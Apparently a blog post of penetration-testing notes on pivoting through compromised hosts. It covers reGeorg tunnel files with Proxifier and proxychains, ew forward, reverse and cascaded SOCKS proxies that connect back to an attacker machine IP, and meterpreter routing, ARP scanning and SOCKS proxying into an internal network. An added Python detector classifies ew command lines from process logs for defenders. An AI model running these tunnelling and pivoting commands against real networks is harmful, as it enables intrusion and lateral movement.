2019-12-20: Port forwarding and proxying, notes

Network forwarding and proxies, part 1: proxies
reGeorg + Proxifier
1. Upload the reGeorg tunnel file that matches the server-side language to the edge machine, then open the tunnel file in a browser; the message "all seems fine" means it worked. Once it succeeds, copy the URL.
2. Run python reGeorgSocksProxy.py -u url -p port; after it starts, the message "all seems fine" again means it is ready.
3. Open Proxifier and add a proxy server: the address is 127.0.0.1, the port is the one set for reGeorg, and the protocol is SOCKS version 4.
4. Open Proxification Rules and select the proxy server added earlier, so that traffic uses the proxy instead of Direct mode.

Using the proxy on Linux with proxychains
1. Upload the reGeorg tunnel file that matches the server-side language to the edge machine, then open the tunnel file in a browser; the message "all seems fine" means it worked. Once it succeeds, copy the URL.
2. Run python reGeorgSocksProxy.py -u url -p port; after it starts, the message "all seems fine" again means it is ready.
3. Edit the configuration file /etc/proxychains.conf and add the proxy server in the following format (proxy type, address, port):
socks4 127.0.0.1 1234

reGeorg + SocksCap64
In SocksCap64, create a new proxy server and configure it, then add the programs that need to use the proxy; they can then be run through it.

ew proxy (SOCKS protocol)
-s: specify the link state (6 kinds)
-l: local listening port
-d: address of the host to forward to or connect back to
-e: port of the host to forward to or connect back to
-f: address of the host to connect or map to
-g: port of the host to connect or map to

Forward proxy: on the compromised host, ew -s ssocksd -l 1080. This requires opening a port on the target machine.
Reverse proxy: on the host with a public IP, ew -s rcsocks -l 1080 -e 8888 (listening ports).
On the compromised host: ew -s rssocks -d [attacker machine IP] -e 8888
Multi-stage cascade
On the host with a public IP, open the listening channel ports: ew -s lcx_listen -l 1080 -e 8888
On the target machine: ew -s lcx_tran -l 1080 -f 2.2.2.3 -g 9999, which maps port 1080 to port 9999 of the machine at the target network IP.
On the target machine: ew -s lcx_slave -d [attacker machine IP] -e 8888 -f 2.2.2.3 -g 9999, where -f is the IP of the host being forwarded to and -g is the forwarded port. The -f address can be the current target machine's own IP or the IP of another host inside the network.

Three-stage cascade
ew -s rcsocks -l 1080 -e 8888
ew -s lcx_slave -d 127.0.0.1 -e 8888 -f 127.0.0.1 -g 9999
ew -s lcx_listen -l 9999 -e 7777
ew -s rssocks -d 127.0.0.1 -e 7777
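
For defenders, the -s modes and flags listed above form a usable command-line signature. The following is an added example (not from the original notes or from the ew project) that classifies process command lines, such as those in process-creation logs, by ew mode and extracts the listening ports and outbound endpoints. Which flags are listeners and which are outbound targets is inferred from the usage lines in these notes, and the sample lines, paths and the 203.0.113.10 address are constructed.

```python
import re

# ew -s modes from the notes above. For each: flags whose value is a local
# listening port, and (address flag, port flag) pairs the process dials out to.
# This listen/dial split is an assumption inferred from the usage lines in the notes.
EW_MODES = {
    "ssocksd":    (("-l",), ()),
    "rcsocks":    (("-l", "-e"), ()),
    "rssocks":    ((), (("-d", "-e"),)),
    "lcx_listen": (("-l", "-e"), ()),
    "lcx_tran":   (("-l",), (("-f", "-g"),)),
    "lcx_slave":  ((), (("-d", "-e"), ("-f", "-g"))),
}

def classify(cmdline):
    """Return mode, listening ports and outbound endpoints, or None.

    Keys on the -s argument rather than the binary name, so a renamed
    executable is still recognised."""
    argv = cmdline.split()
    opts = {argv[i]: argv[i + 1] for i in range(len(argv) - 1)
            if re.fullmatch(r"-[sldefg]", argv[i])}
    spec = EW_MODES.get(opts.get("-s"))
    if spec is None:
        return None
    listen_flags, dial_pairs = spec
    needed = set(listen_flags) | {f for pair in dial_pairs for f in pair}
    if not needed.issubset(opts):
        return None  # mode name present but its flags are not: likely unrelated
    try:
        listens = [int(opts[f]) for f in listen_flags]
        dials = [(opts[a], int(opts[p])) for a, p in dial_pairs]
    except ValueError:
        return None  # port values must be numeric
    return {"mode": opts["-s"], "listens": listens, "dials": dials}

def scan(lines):
    """Return (command line, finding) for every line that matches."""
    return [(line, hit) for line in lines if (hit := classify(line))]

# Constructed process-creation command lines (paths and 203.0.113.10 are made up).
SAMPLE = [
    "/tmp/.cache/upd -s rssocks -d 203.0.113.10 -e 8888",
    "C:\\Users\\Public\\svch.exe -s lcx_tran -l 1080 -f 2.2.2.3 -g 9999",
    "./ew -s rcsocks -l 1080 -e 8888",
    "ssh -s -l admin backup01 sftp",
    "curl -s -d a=1 -e http://ref.example https://example.org",
]

if __name__ == "__main__":
    for line, hit in scan(SAMPLE):
        print(hit["mode"], "listens:", hit["listens"], "dials:", hit["dials"], "cmd:", line)
```

The extracted ports and endpoints can be correlated with firewall or netflow records to find the other stages of a cascade.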

Internal-network penetration with meterpreter
1. After getting a session on the edge machine, first collect information such as the IP address and check the network segment, then set a route: run autoroute -s 10.10.10.0/24, or run post/multi/manage/autoroute to set the route automatically.
2. Scan the machines on the internal network (IP scan and port scan): run post/windows/gather/arp_scanner rhosts=10.10.10.0/24, or run arp_scanner -r 10.10.10.0/24; for port scanning, use auxiliary/scanner/portscan/tcp.
3. Set up a proxy: use auxiliary/server/socks5, configure the proxy software with vim /etc/proxychains.conf, add the proxy server and port, and then try a scan with proxychains nmap.


Origin www.cnblogs.com/sym945/p/12071216.html